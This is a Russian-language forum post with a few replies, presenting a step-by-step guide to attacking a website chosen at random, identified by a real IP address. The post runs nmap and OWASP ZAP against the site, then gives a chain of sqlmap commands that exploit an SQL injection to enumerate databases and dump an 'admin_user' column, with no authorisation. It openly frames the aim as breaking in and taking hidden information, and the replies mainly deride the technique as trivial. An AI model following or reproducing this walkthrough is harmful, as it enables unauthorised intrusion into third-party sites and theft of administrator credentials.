Cканирование Сайтов на уязвимость - значимая часть в жизни пентестера. В данной статье мы погворим о взломе определённой целиУязвимость помогает злоумышленникам : Проникновенние в систему&Забрать ценную информацию которая спрятанна от постороних глаз. Утилиты Которые будут использованны : Nmap, Owasp-Zap sqlmap. (Все утилиты идут по умолчанию в дистрибутивах - Kali Linux/ParrotOs(Опционально) План действий Сбор Информации о цели Поиск Уязвимостей Инъекция. Cканнирование С помощью Nmap Я выбрал случайный сайт. В терминале пишем: nmap -A 216.250.120.70 Code nmap -A 216.250.120.70 nmap - запуск утилиты -A - параметр (Глубокое cканирование) 216.250.120.70 - Ip адресс IP адресс можно узнать командой - ping www.^site^.com Cканирование Запускаем Owasp-Zap и Bбиваем туда наш сайт. Пошло cканирование:) (В левом нижнем углу будут расположенны флажочки,они показывают сколько ошибок и их значимость) У меня нашлось одна критическая ошибка - sql injection Инъекция После того как мы нашли уязвимость мы должны "реализовать" её в зависимости от типа уязвимости. Я буду использывать sqlmap в терминале пишем: sqlmap -u www.^site^.com^/уязвимость^ --dbs Code sqlmap -u www.^site^.com^/уязвимость^ --dbs После cканированния у нас будет бд Нас интересует information_schema Далее пишем в терминале: sqlmap -u www.site.com/exploit -D information_schema --tables Code sqlmap -u www.site.com/exploit -D information_schema --tables Мы получаем таблицы. Выбираем Нужное нам,я к примеру выбиру tables sqlmap -u http://www.site.com/exploit -D information_schema -T TABLES --columns Code sqlmap -u http://www.site.com/exploit -D information_schema -T TABLES --columns Получаем "Колонны" Ничего тут интересного нету:cry: Ноо,закончим начатое дело,Идём дальше. sqlmap -u http://site.com/exploit -D information_schema -T TABLES -C TABLE_NAME --dump Code sqlmap -u http://site.com/exploit -D information_schema -T TABLES -C TABLE_NAME --dump И вот тут мы выбираем что нам нужно "сдампить" sqlmap -u http://site.com/exploit -D information_schema -T TABLES -C admin_user --dump[SIZE=4] Code sqlmap -u http://site.com/exploit -D information_schema -T TABLES -C admin_user --dump[SIZE=4] (ниже логины) Всем спасибо за внимание,все притензии/вопросы в лс,флудить не стоит,Всем удачи:)
хоть и рассказывает очевидные для меня вещи(дайте повыебываться),но очень годно.Дайте аффтарскую челу-заслужил
то, что ты запустил nmap - это ещё не сканирование сайта на уязвимость ты написал статью, где ты просто достал обычную инфу о сайте, а потом древним методом (кстати говоря, как и на остальных форумах), написал как правильно нужно дампить бд с нубо-сайтов, это может сделать каждый...
Немного не понял логику, что из сканирования nmapom повляло на твое решение просканировать сайт овасп-запом, вернее для чего в данном случае сбор информации был вообще?